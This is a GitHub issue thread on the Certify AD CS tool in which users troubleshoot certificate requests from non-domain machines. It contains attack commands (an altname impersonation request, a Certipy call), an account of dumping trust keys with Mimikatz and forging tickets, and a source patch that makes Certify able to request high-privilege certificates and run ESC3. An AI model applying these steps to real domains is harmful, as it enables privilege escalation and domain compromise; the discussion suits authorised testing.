Not working in non domain computer #13

Open
puniaze opened this issue Feb 14, 2022 · 9 comments

@puniaze

puniaze commented Feb 14, 2022

Hi, you are probably already aware of the problems related to running Certify on a non-domain machine. Even though I tried different test cases (runas, netonly, ptt, cmd over pth), each time I got an exception and was not able to request a certificate. Could you please recommend what I can do about this, in case you don't plan any code updates for this issue?
Thanks

@git-oaktree

Try the /domain and /ldapserver with the find function. E.g. certify.exe find /domain:github.com /ldapserver:4.2.2.2

@hypnoticpattern

If you just need to query the ldap server you can do that from a non-domain joined machine using:

Runas /user:[email protected] /netonly powershell

and then run the commands you need:

.\Certify.exe find /vulnerable /domain:corp.contoso.com /ldapserver:10.0.10.1

All the information about templates and permissions is correctly listed. The problem is that when you need to request a certificate, Certify errors out:

PS C:\Users\User\Desktop\Tools> .\Certify.exe request /domain:corp.contoso.com /ca:ADCS01.corp.contoso.com\ContosoCA /template:"Copy of RAS and IAS Server" /altname:dad /subject:"CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com"

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : WINDOWS10-TESTI\User

[*] Template                : Copy of RAS and IAS Server
[*] Subject                 : CN=Low Privilege,CN=Users,DC=corp,DC=contoso,DC=com
[*] AltName                 : dad

[!] Unhandled Certify exception:

System.Runtime.InteropServices.COMException (0x80094015): CertEnroll::CX509CertificateRequestPkcs10::InitializeFromPrivateKey: An enrollment policy server cannot be located. 0x80094015 (-2146877419 CERTSRV_E_NO_POLICY_SERVER)
   at CERTENROLLLib.CX509CertificateRequestPkcs10Class.InitializeFromPrivateKey(X509CertificateEnrollmentContext Context, IX509PrivateKey pPrivateKey, String strTemplateName)
   at Certify.Cert.CreateCertRequestMessage(String templateName, Boolean machineContext, String subjectName, String altName)
   at Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)
   at Certify.Commands.Request.Execute(Dictionary`2 arguments)
   at Certify.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Certify.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


Certify completed in 00:00:05.3014542

If I join the machine to the domain, the same command succeeds.

@bestrocker221

I have the same problem: even in a runas netonly session, the certificate request takes the current user context (not the runas) on a non-domain-joined computer.
Is there any way around this?

@heyquentin

Same problem here too.

@NickYan7

Certipy (https://github.com/ly4k/Certipy) can solve this, which also works for my issue in #27.

e.g.

// ptt
certipy -u [email protected] -k -nopass -ca domain-ca -target dc.domain.com -template User -debug

@ken013194

I hit the same issue too. The scenario is a bit different, though, in that I am requesting the certificate from a trusted domain in a one-way outbound trust environment. Would like to know if there are any workarounds for certify. Certipy shall work but I haven’t tested it out.

@GonZ0s

GonZ0s commented Apr 14, 2023

> I hit the same issue too. The scenario is a bit different, though, in that I am requesting the certificate from a trusted domain in a one-way outbound trust environment. Would like to know if there are any workarounds for certify. Certipy shall work but I haven’t tested it out.

I'm in the same boat. Did you figure out a solution yet?

@Eliotsehr

Eliotsehr commented Sep 12, 2023

Hello,

I ended up in a similar situation and I think I found a solution, so I'm sharing my experience in the hope that it helps.

My scenario was :

  • I have Domain Admin access in Domain A which has a One-Way Outbound Trust with Domain B
  • I dumped the shared key in the Trusted Domain Object using Mimikatz on Domain A DC
  • I used that key to request a TGT for the Domain A trusted account that exists in Domain B
  • I used that TGT to impersonate this user (let's say A$)

So I'm in a PTT session on a computer outside of Domain B and when I try to use Certify I have the same error saying that "An enrollment policy server cannot be located."

To fix this issue I ended up changing Certify source code in Cert.cs line 89 from :

objPkcs10.InitializeFromPrivateKey(context, privateKey, templateName);

To :

objPkcs10.InitializeFromPrivateKey(context, privateKey, "");

CX509ExtensionTemplateName templateExtension = new CX509ExtensionTemplateName();
templateExtension.InitializeEncode(templateName);
objPkcs10.X509Extensions.Add((CX509Extension)templateExtension);

Why does it work? I have no clue, but I saw similar issues on Stack Overflow so I gave it a shot and I was then able to request a certificate for a high privilege user, then a TGT, etc.
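
For readers reviewing certificate requests, the following added example (not part of the post above and not Certify code) shows what the `CX509ExtensionTemplateName` object in that change puts into the request: the Certificate Template Name extension, OID 1.3.6.1.4.1.311.20.2, whose value is the template name as a DER BMPString. The function names are this example's own, and the inputs used with it are constructed samples.

```python
# Added example: DER codec for the Certificate Template Name extension
# (OID 1.3.6.1.4.1.311.20.2); the value is a BMPString, i.e. UTF-16BE text.
TEMPLATE_NAME_OID = bytes.fromhex("2b0601040182371402")

def der_tlv(tag: int, body: bytes) -> bytes:
    """Wrap body in a DER tag-length-value triple."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(raw)]) + raw + body

def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, value, next_pos); reject truncated or indefinite lengths."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first == 0x80:
        raise ValueError("indefinite length is not valid DER")
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated DER value")
    return tag, buf[pos:pos + length], pos + length

def encode_template_extension(name: str) -> bytes:
    """Extension ::= SEQUENCE { extnID OID, extnValue OCTET STRING }."""
    bmp = der_tlv(0x1E, name.encode("utf-16-be"))
    return der_tlv(0x30, der_tlv(0x06, TEMPLATE_NAME_OID) + der_tlv(0x04, bmp))

def decode_template_extension(ext: bytes):
    """Return the template name, or None if ext is a different extension."""
    tag, seq, _ = read_tlv(ext)
    if tag != 0x30:
        raise ValueError("extension is not a SEQUENCE")
    tag, oid, pos = read_tlv(seq)
    if tag != 0x06 or oid != TEMPLATE_NAME_OID:
        return None
    tag, value, pos = read_tlv(seq, pos)
    if tag == 0x01:  # optional 'critical' BOOLEAN precedes the value
        tag, value, pos = read_tlv(seq, pos)
    if tag != 0x04:
        raise ValueError("extnValue is not an OCTET STRING")
    tag, bmp, _ = read_tlv(value)
    if tag != 0x1E:
        raise ValueError("template name is not a BMPString")
    return bmp.decode("utf-16-be")
```
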

@topolsa

topolsa commented Dec 14, 2024

Actually, it’s better to apply this code replacement in two places: in the CreateCertRequestMessage and CreateCertRequestOnBehalfMessage methods.
This way, you can execute more complex attacks, including ESC3, from a non-domain host.
